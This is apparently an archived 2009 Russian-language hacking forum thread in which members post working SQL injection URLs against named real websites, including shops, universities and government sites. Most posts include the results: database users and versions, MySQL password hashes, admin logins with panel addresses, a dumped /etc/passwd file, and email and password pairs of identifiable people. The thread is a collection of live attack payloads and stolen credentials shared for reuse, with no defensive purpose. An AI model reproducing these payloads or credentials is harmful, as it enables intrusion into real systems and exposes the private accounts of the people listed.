Просмотр полной версии : SQL Инъекции
spherics
24.02.2009, 23:51
http://www.rinkfinder.com/arenas/view_arena.asp?ID=1687687368768762+union+select+1, 2,3,concat_ws(0x3a,version(),user(),database()),5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 ,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5 7,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73, 74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90 ,91,92,93,94,95,96,97,98,99,100,101,102,103,104,10 5,106,107,108,109,110,111,112,113,114,115,116,117, 118,119,120,121,122,123,124,125,126,127,128,129,13 0,131,132,133,134,135,136,137,138--
Database Version: 5.0.45
Database name: rinkfinder
User name: testuser@209.240.73.210
http://www.rinkfinder.com/arenas/view_arena.asp?ID=1687687368768762+union+select+1, 2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,4 5,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61, 62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78 ,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,9 5,96,97,98,99,100,101,102,103,104,105,106,107,108, 109,110,111,112,113,114,115,116,117,118,119,120,12 1,122,123,124,125,126,127,128,129,130,131,132,133, 134,135,136,137,138+from+mysql.user+limit+0,1--
root : 304c680c7bea9e43 хэш MySQL : 304c680c7bea9e43 : trainwreck
На Винде 2003
2ip показал 161 сайт.
http://www.lautrecampagne.org/article.php?id=0137986542+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,concat_ws(0x3a,version(),user() ,database()),15,16,17,18,19,20,21,22,23,24--
Database Version: 5.0.68-log
Database name: lautrecafmyBd
User name: lautrecafmyBd@10.0.85.131
http://www.lautrecampagne.org/article.php?id=0137986542+UNION+SELECT+1,2,3,4,5,6 ,7,8,9,10,11,12,13,CONCAT(0x3a,(SELECT+CONCAT(user Email,0x3a,userMdp)+FROM+lautrecafmyBd.tacusers+LI MIT+1,1),0x3a),15,16,17,18,19,20,21,22,23,24--
:f.bourgade@free.fr :fb
:passant.ordinaire@wanadoo.fr :jmoqtw56
:le_strat@eaudeparis.fr :bghlnrsv
:immanuel.wallerstein@yale.edu :cgkx3578
:julie@avenuebprod.com :df7frt2p
:gdebregeas@gmail.com :cefhkrs7
:susangeorge@free.fr :blostxz1
:chemgen@ext.jussieu.fr :deguvz17
:etienne.balibar@wanadoo.fr:uytz9lh3
:bouveres@noos.fr :ghuvyz37
:mgaillenikodimov@yahoo.fr :eqrvxz56
ГРУППЫ КОДЕРОВ НА ПХП-))
PageRank = 6
http://www.phpusergroups.org/groups.phtml?id=179879865398072+union+select+conca t_ws(0x3a,version(),user(),database()),2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17--&menu=groups
Database Version: 5.0.18-standard
Database name: phpuserg
User name: phpuserg@localhost
mailbrush
25.02.2009, 00:59
http://dr-gng.dp.ua/index.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f 756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf ),2,3,4,concat(0x3c623e7573657228293a6461746162617 36528293a76657273696f6e28293a3c2f623e203c693e,user (),0x3a,database(),0x3a,version())+from+rkh8t5po
user():database():version()
guZsp4@localhost:gEm1Zn:4.1.22-log
Admin Account
admin:Vpa4M9ql
http://www.gemeni.com.ua/admin
---------------------------------------------------------------------------------------
http://dr-gng.dp.ua/index.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f 756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf ),2,3,4,concat(0x3c623e7573657228293a6461746162617 36528293a76657273696f6e28293a3c2f623e203c693e,user (),0x3a,database(),0x3a,version())+from+rkh8t5po
user():database():version()
drgngdpua_dGu3@localhost:drgngdpua_dgB9:5.0.67-community
Admin Account
admin:s6Mzp1sB8Ag4Jq
http://dr-gng.dp.ua/admin
---------------------------------------------------------------------------------------
http://www.med-tech.kiev.ua/index.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f 756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf ),2,3,4,concat(0x3c623e7573657228293a6461746162617 36528293a76657273696f6e28293a3c2f623e203c693e,user (),0x3a,database(),0x3a,version())+from+rkh8t5po
user():database():version()
culkin_mtuK4c1@localhost:culkin_mtchZ5d:5.0.67-community
Admin Account
admin:f7maLp3V6mZzt6fpsR
http://med-tech.kiev.ua/admin
---------------------------------------------------------------------------------------
http://forex-4-all.ru/ndex.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f 756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf ),2,3,4,concat(0x3c623e7573657228293a6461746162617 36528293a76657273696f6e28293a3c2f623e203c693e,user (),0x3a,database(),0x3a,version())+from+rkh8t5po
user():database():version()
dzubaa_FpR5U@localhost:dzubaa_frX4fs:4.1.22-standard
Admin Account
admin:jp4Clz9S
http://forex-4-all.ru/admin
---------------------------------------------------------------------------------------
http://scotland.org.ua/index.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f 756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf ),2,3,4,concat(0x3c623e7573657228293a6461746162617 36528293a76657273696f6e28293a3c2f623e203c693e,user (),0x3a,database(),0x3a,version())+from+rkh8t5po
user():database():version()
qwertyadm1_rma6l@localhost:qwertyadm1_scOtL:5.0.67-community
Admin Account
admin:paLz5C9qm1
http://scotland.org.ua/admin
---------------------------------------------------------------------------------------
http://russia-forex.ru/index.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f 756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf ),2,3,4,concat(0x3c623e7573657228293a6461746162617 36528293a76657273696f6e28293a3c2f623e203c693e,user (),0x3a,database(),0x3a,version())+from+rkh8t5po
user():database():version()
dzubaa_fRux0F@localhost:dzubaa_RfuL4m:4.1.22-standard
Admin Account
admin:iKd8B1kzf6
http://russia-forex.ru/admin
---------------------------------------------------------------------------------------
http://www.cooler.dp.ua/index.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f 756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf ),2,3,4,concat(0x3c623e7573657228293a6461746162617 36528293a76657273696f6e28293a3c2f623e203c693e,user (),0x3a,database(),0x3a,version())+from+rkh8t5po
user():database():version()
drgngdpua_Cu2L6@localhost:drgngdpua_C2ol3a:5.0.67-community
Admin Account
admin:PV4mAG3Ck
http://www.cooler.dp.ua/admin
---------------------------------------------------------------------------------------
http://www.bfstimul.dp.ua/index.php?act=publ&id=-9+union+select+concat(0x3c623e41646d696e204163636f 756e743a3c2f623e3c62723e2061646d696e3a,pass459khyf ),2,3,4,concat(0x3c623e7573657228293a6461746162617 36528293a76657273696f6e28293a3c2f623e203c693e,user (),0x3a,database(),0x3a,version())+from+rkh8t5po
user():database():version()
drgngdpua_bfU5v@localhost:drgngdpua_bfDn4:5.0.67-community
Admin Account
admin:f5Jma2KpX
http://www.bfstimul.dp.ua/admin
http://www.supercalculatoare.com/compara.php?ID=-5730+union+select+1,2,3,version(),user(),6,7,8,9,0 ,11,12,13,14,15--
Database Version: 5.0.67-community-log
Database Name: super
User name: super@localhost
http://www.museum.upenn.edu/new/events/calitem.php?which=-1801+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24+from+admin/*
Version: 4.1.10-nt
Username: upenn@localhost
Dbname: upenn
Assembler
25.02.2009, 12:54
http://www.greywolves.co.uk/page.php?pid=13%20union%20select%201,2,concat_ws(0 x3a,user,password),4,5,6,7,8,9,10%20from%20mysql.u ser--
mysql.user
truststfc:6d6e0e253af1fe4f
file_priv=N =(
AkyHa_MaTaTa
25.02.2009, 13:38
www.agenpulsa.info PageRank 4
http://www.agenpulsa.info/mod.php?mod=publisher&op=viewarticle&artid=-1+union+select+1,2,3,group_concat(concat_ws(0x3A,u name,pass)+SEPARATOR+0x3c62723e),5,6,7,8,9,10,11+f rom+users--
www.alsofwah.or.id PageRank 5
http://www.alsofwah.or.id/cetakberita.php?id=-78++union+select+1,concat_ws(0x3A,user,password,em ail),3,4,5,6,7,8+from+u2842_alsofwah.user+--+
http://www.mfcspartak-mo.ru/index.php?id=-1+union+select+1,2,concat_ ws(0x3a,version( ),database(),user()),4,5,6,7--
Database Version : 4.0.27-max-log
Database name : mfcspart_book
User name : mfcspart_book@v55.valuehost.ru
--------------------------------------------------------#
http://www.armfootball.com/index.php?Page=News&Lang=Rus&ID=-1+union+select+1,2,concat_ ws(0x3a,version(),database(),user()),4,5--
Database Version : 5.0.67-community
Database name : nareco_armfootball
User name : nareco_root@localhost
ph1l1ster
25.02.2009, 23:22
http://www.idibaps.ub.edu/eng/equipo.php?anyo=2001&arid=2&id=-13+union+select+1,2,3,concat(user(),0x3a,version() ),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55, 56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71/*
http://profusion.bu.edu/techlab/modules/references/view_author.php?id=-109+union+select+1,concat(user,0x3a,password),3,0x 776861636b,5,6,7,8,9,10+from+mysql.user
http://www.housing.wisc.edu/resnet/news/story.php?id=-109+union+select+1,2,3,4,5,concat(user,0x3a,passwo rd),7,8,9,10+from+mysql.user+limit+0,1
http://dvaction.northwestern.edu/parentdetail.php?id=109+AND+ascii(lower(substring( version(),1,1)))=53
http://www.ece.virginia.edu/profiles.php?ID=-109+union+select+1,2,3,4,5,6,7,version(),9,10,11,1 2,13,14,15,16,17,18,19,20,21
http://depts.washington.edu/mcb/facultyinfo.php?id=-109+union+select+1,2,3,version(),5,6,7,8,9,10,11,1 2,13,14,15,16,17,18/*
ТИЦ : 1100
http://www.tourtrans.ru/index.php?page=news&id=-1+union+select+1,2,concat _ws(0x3a, version(),database(),user ())--
Database Version : 4.0.27-log
Database name : tteurope
User name : tteurope@zvm21.host.ru
---------------------------------------------------#
PR: 5
тИЦ: 950
http://www.solvex.ru/agents/?uid=-1+union+select+1,2,3,4,concat _ws(0x3a,version(),database(),use r()),6,7,8,9,10,11,12,13,14,15,16,17--
Database Version : 5.0.67-log
Database name : solvex-travel_ru
User name : solvex-travel_ru@zvm23.host.ru
http://www.solvex.ru/agents/?uid=-1+union+select+1,2,3,4,table _name,6,7,8,9,10,11,12,13,14,15,16,17+from+ information_schema.tables+limit+0,1--
50 столбцов, но юзверей я что-то так и не нашел (((
http://www.system-plus.ro/noutati-details.php?id=72+AND+ASCII(SUBSTRING((select+vers ion()),1,1))=x/*
x=52,46,49,46,50,50,45,115,116,97,110,100,97,114,1 00
http://www.system-plus.ro/noutati-details.php?id=72+AND+ASCII(SUBSTRING((select+data base()),1,1))=x/*
x=115,121,115,116,101,109,112,95,115,112
http://www.system-plus.ro/noutati-details.php?id=72+AND+ASCII(SUBSTRING((select+user ()),1,1))=x/*
x=115,121,115,116,101,109,112,95,115,112,64,108,11 1,99,97,108,104,111,115,116
Version : 4.1.22-standard
Database : systemp_sp
User : systemp_sp@localhost
AkyHa_MaTaTa
26.02.2009, 04:27
aib.in.ua вывод в title
http://aib.in.ua/objav/car/?id=-1+union+select+1,2,3,concat_ws(0x3A,@@version,user (),database())+--+
www.architectuurcentrumnijmegen.nl PageRank - 4
http://www.architectuurcentrumnijmegen.nl/default.php?menu=-99999/**/union/**/select/**/unhex(hex(version()))/*
www.merkur.ba PageRank - 4
http://www.merkur.ba/aktuelno/vijest.php?id=-155+union+select+unhex(hex(@@version)),2,3,4,5,6+--+
www.pave.fr PageRank - 5
http://www.pave.fr/sections.php3?op=viewarticle&artid=-255+union+select+1,2,@@version,4,5+--+
www.apci.asso.fr PageRank - 7, это самое большее количество колонок c которым я только вcтречался(135):
http://www.apci.asso.fr/l_observeur/realisation.php?id=-281+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,unhex(hex(concat_ws(0x3A,@@version,user(),dat abase()))),51,52,53,54,55,56,57,58,59,60,61,62,63, 64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80 ,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,9 7,98,99,100,101,102,103,104,105,106,107,108,109,11 0,111,112,113,114,115,116,117,118,119,120,121,122, 123,124,125,126,127,128,129,130,131,132,133,134,13 5+--+
www.arnaudmontebourg.fr PageRank - 4 вывод в title
http://www.arnaudmontebourg.fr/web/nav/article.php?id=425+union+select+concat_ws(user(),@ @version,database()),2,3,4+--+
http://www.milw0rm.com/exploits/8104
Несколько сайтов уже похеконо турками муднями
http://www.gemeni.com.ua/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
http://dr-gng.dp.ua/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
http://all-perfumes.com.ua/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
http://www.med-tech.kiev.ua/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
http://perfumes4you.kiev.ua/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
http://forex-4-all.ru/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
http://scotland.org.ua/index.php?act=publ&id=4-3+UNION+SELECT+1,2,3,4,5
http://www.bfstimul.dp.ua/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
! новичкам посвящается...смотрим что ошибки нет , но идём дальше ..не сдаемся
http://www.cg-gc.ro/cgro/product.php?id_product=-753'
http://www.cg-gc.ro/cgro/product.php?id_product=-753+union+select+concat_ws(0x3a,version(),database (),user()),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7--
Database Version: 5.0.51b-log
Database name: cg_comert
User name: webdesign@localhost
http://www.cg-gc.ro/cgro/product.php?id_product=-753+union+select+load_file(0x2F6574632F70617373776 4),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7--
root:x:0:0::/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/log: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/: operator:x:11:0:operator:/root:/bin/bash ftp:x:14:50::/home/ftp: mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash sshd:x:33:33:sshd:/: gdm:x:42:42:GDM:/var/state/gdm:/bin/bash nobody:x:99:99:nobody:/: design:x:1000:100::/home/design:/bin/bash ceftac:x:1001:100::/home/design/websites/ceftac:/usr/libexec/sftp-server mihai:x:1003:100:,,,:/home/mihai:/bin/bash smmsp:x:25:25:smmsp:/var/spool/clientmqueue: stefan.simon:x:1004:100::/home/stefan:/bin/bash noemi:x:1005:100::/home/design/websites/cggc/download:/usr/libexec/sftp-server apache:x:80:80:User for Apache:/srv/httpd:/bin/false messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
http://www.cg-gc.ro/cgro/product.php?id_product=-753+UNION+SELECT+CONCAT_WS(0x3a,id,username,parola ),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+cg. admini+LIMIT+1,1--
10:corina:0fb9fe42465a3bba
2:florin:*51D2FAEA3257E9A8F8A03DE0DDD63064714239A9
3:fmakai:3519dfb35bfb1071
4:mbadici:1f27f0166150ae6c
5:Cristi:1fd2ce501c6fc21b
9:cornel:301f3d5a629c8bbf
11:corneliu:04c63dc1449c6ee3
13:mihain:413854603fb8058d
14: oana:4f9f544d12d2175e
noemi:60ab75b07c05f0b2
16:cosmin:4a76bb876d218975
27:consumabile:6e174a6035b92e82
28: pressroom:1dce0b286052aba9
29:xfilez:43e9a4ab75570f5b
18:manuela@cg-gc.ro:*C14F97B95A5580BFC49025850E7B8A907E05BBE4
23:loredana:0836d7b259d2893a
20:dorina:7b3c27ed548e8681
21:admin:6c05b43422e2603d
24:marius:789d1ccf4e8f52a2
25:valentinp:6475ff2774a36508
26:gsm:7a2dd7a521e0dd43
30:eudis:1abcf14c12a3b2ef
AkyHa_MaTaTa
26.02.2009, 12:10
www.novibeograd.info PageRank - 3 :(
http://www.novibeograd.info/index.php?strana=vest&id=1+union+select+1,concat_ws(0x3A,memberName,pass wd,passwordSalt),3,4,5+from+novibgd_forum.smf_memb ers+--+
Сам форум здеся
http://www.novibeograd.info/smf/
www.dadaprod.org PageRank - 4
http://www.dadaprod.org/index.php?mode=samizdat&id=-25+union+select+1,2,3,4,concat_ws(0x3a,user_level, user_nom,user_pwd),6,7,8,9,10,11,12+from+dadaprod_ www.dc_user+--+
www.fonora.com PageRank - 4
http://www.fonora.com/index.php?page=product&id=25+union+select+concat_ws(0x3A,user(),@@version ,database()),2+--+&lang=fr
Assembler
26.02.2009, 13:18
http://pfsa.unsa.ba
PR: 5
Тиц: 0
Версия: 4.1.20
База данных: adminpfsa
Юзверь: adminpfsa@localhost
http://www.pfsa.unsa.ba/stream/stream.php?kat=-1%20union%20select%201,2,3,4,5,6,7,8,9--
Админка: https://195.130.35.116:19638/siteadmin/?ocw_login_domain=pfsa.unsa.ba
PR : 5
ТИЦ : 1000
http://www.matchfishing.ru/news/index.php?id1=-1+union+select+1,2,3,4,concat _ws(0x3a, version(),database(),user()),6,7,8,9,10,11,12,13,1 4--
Database Version : 5.1.30
Database name : matchfishing2
User name : matchfishing2@localhost
админ:
http://www.matchfishing.ru/news/index.php?id1=-1+union+select+1,2,3,4,concat _ws(0x3a,login,password),6,7,8,9,10,11,12,13,14+ from+ssrusers+limit+0,1--
radugin:3nyov1
админка:
http://www.matchfishing.ru/admin/
в админке есть много чего ;)
http://www.isoline.ro/index.php?p=view&show=-10+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),user()),3--
Database Version: 5.0.67-log
Database name: isoline
User name: imguser@crunch.dreamhost.com
http://www.artlink.org.ro/index.php?p=view&show=-71+union+select+1,2,3,4,5,unhex(hex(concat_ws(0x3a ,version(),database(),user()))),7,8,9--&lang=1
Version : 4.1.11-Debian_4sarge8
Database : artlink_org_ro
User : artlink_org_ro@webgate-a.infinium.ro
AkyHa_MaTaTa
26.02.2009, 16:42
www.xogospopulares.com Pagerank - 4
http://www.xogospopulares.com/foro/index.php?action=userinfo&user=1%20union%20select%201,2,user_password%20from %20minibb_users%20where%20user_id=1/*
www.lorianevoyages.be Pagerank - 3
http://www.lorianevoyages.be/destinations.php?id=-42+union+select+concat_ws(0x3a,user(),@@version)+--+
-m0rgan-
26.02.2009, 17:31
сайт на Mambo'ском двиге:
http://www.ilcamper.it/Mambo/index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat_ws(0x3a,username,pas sword),6,7,8,9,10,11+from+mos_users--
логин/пасс:
admin:e9e92f1dcb4c8927db6a81a498be68de
hallelujah:059223504eda24f466bea046fb2de347
http://www.ilcamper.it/Mambo/index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),database()),6,7,8,9,10,11+from+mos_users--
юзер/версия/бд:
4.0.27-standard-log:Sql68204@62.149.141.25:Sql6820
-------------------------------------------------------------------
The End
http://www.georgeradu.com/index.php?p=portfolio&s=1&page=1&pr=60+UNION+SELECT+1,2,3,AES_DECRYPT(AES_ENCRYPT(C ONCAT_WS(0x3a,Version(),Database(),User()),0x71),0 x71),5,6,7,8,9,10+LIMIT+1,1--
Database Version: 4.1.22-standard
Database name: georger_georger
User name: georger_gr@localhost
-m0rgan-
26.02.2009, 17:56
шоп...
http://shirleyofhollywood.ru/cat.php?id=-1+union+select+concat_ws(0x3a,uname,pass),2+from+s hir_users--
логин/пасс:
Гость:7b99e31a092a499c08416ce6443ef767
юзер/версия/бд:
5.0.75:shirley@localhost:ling
-------------------------------------------------------------
The End!
http://www.constantin-flondor.com/index.php?p=lucrari&sub_id=29+UNION+SELECT+1,concat_ws(0x3a,version(), database(),user()),3,4,5,6,7,8,9,10+LIMIT+1,1--&lang=ro
Version : 4.1.22-standard
Database : cflondor_flondor
User : cflondor_flondor@localhost
PR: 5
тИЦ: 850
http://rybakinfo.ru/cgi-bin/salers.cgi?saler=34+union+select+1,concat _ws(0x3a, version(),database(),user()),3,4,5,6,7,8,9,10--
Database Version : 4.1.22-log
Database name : db_rinfo81_1
User name : dbu_rinfo81_1@192.168.5.75
http://www.alubel.it/_presentation/Alubel_28___Sistema_integrale_per_coperture_e_rive stimenti/1/IT+union+select+concat_ws(0x3a,version(),database( ),user()),2,3,4,5,6,7,8,9,0,1--/
Database Version: 5.0.67-community
Database name: alubeln_alubelss
User name: alubeln_useralub@localhost
http://www.alubel.it/_presentation/Alubel_28___Sistema_integrale_per_coperture_e_rive stimenti/1/IT+UNION+SELECT+CONCAT_WS(0x3a,adm_username,adm_pa ssword,zona,super_user),2,3,4,5,6,7,8,9,10,11+FROM +alubeln_alubeldatabase.admin--/
veve:6f12d5164b5f02f813af60bc0efc971c:1,2,3,4,5,6, 7:1
raduchiritescu:1f6e20f715ab68a1ab135da4edb1a0c2:1, 2,3,4,5,6,7:1
estero:3137e26fa0c82a9c2076064d3f79b21f:1,2,5:0
cristina:2303540bf6a504c0fd3a4c3110bea33c:1,2,3,4, 5,6,7:1
http://thebuynsell.com/gallery.php?cid=-1+union+select+1,2,3,4+--+
http://thebuynsell.com/gallery.php?cid=-1+union+select+1,concat_ws(0x7c,version(),user(),d atabase()),3,4+--+
5.0.67-community-nt|root@localhost|auction
http://thebuynsell.com/gallery.php?cid=-1+UNION+SELECT+1,CONCAT(admin_name,pwd),3,4+FROM+a uction.sbauctions_admin--
admin:10c14r78031777
jokester: сколько-же можно повторять ШЕЛЛЫ ЗАПРЕЩЕНЫ В ПАБЛИКЕ. Читайте правила
PR: 5
тИЦ: 850
http://hotel.uralregion.ru/index.php?nview=-1+union+select+1,concat _ws(0x3a,version(),database(),user()),3,4,5,6,7,8, 9,10,11--
Database Version : 5.0.41-log
Database name : uralregion
User name : uralregion@berns.mplik.ru
админы:
http://hotel.uralregion.ru/index.php?nview=-1+union+select+1,concat _ws(0x3a,id,login_name,password),3,4,5,6,7,8,9,10, 11+from+login+limit+1,1--
http://www.maxine.ro/stoc-zero.php?id=1979%20UNION%20SELECT%20AES_DECRYPT(AE S_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User ()),0x71),0x71)%20LIMIT%201,1
Database Version: 5.0.67-community
Database name: maxine5_maxine
User name: maxine5_maxine@localhost
-m0rgan-
26.02.2009, 19:11
ТИЦ:2100
PR:4
http://top.ryazan.ru/stat.php?id=-158+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws (0x3a,version(),user(),database()),13,14,15,16,17, 18,19,20,21--
----------------------------------------------------------
The End!
http://www.misenashop.ro/produse/detalii/Rochie-cu-volane/777+AND+ASCII(SUBSTRING((select+version())1,1))>x/
x=52,46,49,46,50,50,45,115,116,97,110,100,97,114,1 00
http://www.misenashop.ro/produse/detalii/Rochie-cu-volane/777+AND+ASCII(SUBSTRING((select+database())1,1))>x/
x=51,49,49,54,48,50,95,109,105,115,101,110,97
http://www.misenashop.ro/produse/detalii/Rochie-cu-volane/777+AND+ASCII(SUBSTRING((select+user())1,1))>x/
x=109,105,115,101,110,97,64,56,50,46,55,54,46,50,5 3,51,46,56,51
Version : 4.1.22-standard
Database : 311602_misena
User : misena@82.76.253.83
Cennarios
26.02.2009, 21:10
PR4
http://www.frosszelnick.com
http://www.frosszelnick.com/ourfirm/press/view?id=-1'+union+select+1,username,3,4,5,6,password,8,9,10 ,11,12,13,14,15,16,17,18,19+from+users/*
login:admin
pass:fez
http://www.frosszelnick.com/admin/
Чпок! добрый вечер!
http://sport-tovari.ru/texts/int.php?id=-6+union+select+1,version()--
5.0.67-log
кому на халяву кеды нужны?))
ttp://sport-tovari.ru/admin/
а вот и админка, но она на бесик авторизации =(((
тиц 110
пр 5
Pagerank: 5
тИЦ: 1900
http://www.logistic.ru/news/news.php?num=2009/02/26/16/99999+union+select+1,2,3,4,5,6,concat _ws(0x3a,version(),database(),user()),8,9,10,11,12 ,13,14,15--
Database Version : 5.0.54-log
Database name : bo_logistic
User name : katalog@localhost
http://www.tradati-in-dragoste.ro/poveste/tradarea-doare/68+AND+ASCII(SUBSTRING((select+version()),1,1))=x/
x=52,46,49,46,50,50,45,115,116,97,110,100,97,114,1 00,45,108,111,103
http://www.tradati-in-dragoste.ro/poveste/tradarea-doare/68+AND+ASCII(SUBSTRING((select+database()),1,1))=x/
x=116,114,97,100,97,116,105,95,116,114,97,100,97,1 16,105
http://www.tradati-in-dragoste.ro/poveste/tradarea-doare/68+AND+ASCII(SUBSTRING((select+user()),1,1))=x/
x=116,114,97,100,97,116,105,95,109,105,104,97,101, 108,97,64,108,111,99,97,108,104,111,115,116
User : tradati_mihaela@localhost
Database : tradati_tradati
Version : 4.1.22-standard-log
Pagerank: 5
тИЦ: 1600
http://www.pecom.ru/ru/news/index.php?id=9999999999+union+select+1,2,concat _ws(0x3a ,version(),database(),user()),4,5,6,7,8,9,10--
Database Version : 5.0.45
Database name : pecomru
User name : pecomru@localhost
админы:
http://www.pecom.ru/ru/news/index.php?id=9999999999+union+select+1,2,concat_ ws(0x3a, username,password), 4,5,6,7,8,9,10+from+npk_users--
Root:e2ca9349eaf2653b87d267c3ff20267f
Admin:cc07f226b4a09bed098607093a2db221
Lyuda:e077e1a544eec4f0307cf5c3c721d944
Richard:202cb962ac59075b964b07152d234b70
Feda:da2328ee004685ffa97c2d811a200c86
nvm:827ccb0eea8a706c4c34a16891f84e7b
admin1:21232f297a57a5a743894a0e4a801fc3
http://www.bidbuysells.com/auction_details.php?name=PHP-ProBid-Mods-v60603-Italian-Language-Pack&auction_id=-113067+union+select+1,2--
http://www.airrider.com/store/category.php?cookiecheck=true&cat=-33+union+select+version()--
version():5.0.67-community
user():airrider_airride@localhost
Pagerank: 6
тИЦ: 2000
http://www.akdi.ru/scripts/novosti/smotri.php?z=9999999+union+select+1,concat _ws(0x3a,versio n(),database(),user()),3,4--
Database Version : 5.0.67-log
Database name : u74105_akdi
User name : u74105@10.10.227.51
админ:
http://www.akdi.ru/scripts/novosti/smotri.php?z=9999999+union+select+1,concat_ ws(0x3a,name ,password),3,4+from+admin--
Admin:profforumakdi
http://www.bebeunivers.ro/detalii_produs.php?id_cat=&id_p=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23
Version : 4.1.22-standard-log
Database : bebeuniv_bebeunivers
User : bebeuniv_bebe@s010.hostway.ro
Assembler
27.02.2009, 09:58
http://www.golc.jp
PR: 2
Тиц: 10
Версия: 5.0.67-community-log
База данных: global_AutoLibrary
Юзверь: global_admin@localhost
http://www.golc.jp/library/make.php?ID=1%20union%20select%201,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19%20--
AkyHa_MaTaTa
27.02.2009, 10:11
boiteaoutils.cidem.org PageRank - 6
http://boiteaoutils.cidem.org/produits.php?theme=-2+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6+--+
4.0.25-standard-log:cidemoutils@10.0.62.118:cidemoutils
www.turbazar.ru - PageRank - 5 ТиЦ -300 вывод в титле
http://www.turbazar.ru/index.php?s=3&c=12&m=46&id_hotel=29+union+select+1,2,concat_ws(0x3A,@@vers ion,user(),database())+--+
Версия : 5.0.67
Юзер : grandtour@194.87.13.136
База : grandtour
http://www.turbazar.ru/index.php?s=3&c=12&m=46&id_hotel=29+union+select+1,2,concat_ws(0x3A,user,p assword,host,file_priv,user())+from+mysql.user+--+
grandtour:*F28B6D83F6F364EE8B7B69BE4113813DF72EAD9 6:80.84.119.24:Y:grandtour@194.87.13.136
В базе есть пару шопов , ну дальше сами.
http://hembar.ru//index.php?option=com_assortment&task=view&id=1{sqlinj}
Database Version: 5.0.45-log
Database name: hembar
User name: root@localhost
!!!FILE_PRIV=YES!!!
Санкт-Петербургский Английский клуб
http://www.spbak.ru/members?-16+union+select+1,user(),database(),version(),5,6, 7,8/*
User: engclub9_akdb@v15.va
Database: engclub9_akdb
Version: 4.0.27-max-log
ph1l1ster
27.02.2009, 14:24
gov:
http://www.fo1.dswd.gov.ph/articledetails.php?id=-273+union+select+1,2,concat(user,0x3a,password),4, 5,6+FROM+mysql.user
http://www.shandongbusiness.gov.cn/public/zhuanti/kxfzg/index_ok2.php?id=-33+union+select+1,concat(user,0x3a,password),3,4,5 ,6+FROM+mysql.user
http://support.aide.gov.tw/sub_page_index.php?c_id=35&c_parentid=22&c_rootid=-5+union+select+1,2,3,4,5,6,7,concat(user,0x3a,pass word),9,10,11,12,13,14+from+mysql.user
И:
http://web272.login-1.hoststar.at/mambo/index.php?option=com_rsgallery&page=inline&catid=-1+union+select+1,2,3,4,concat(username,0x3a,passwo rd),6,7,8,9,10,11+from+mos_users
http://www.tsv-kelbachgrund.net/wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,passwo rd),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28+from+jos_users+limit+0,1--
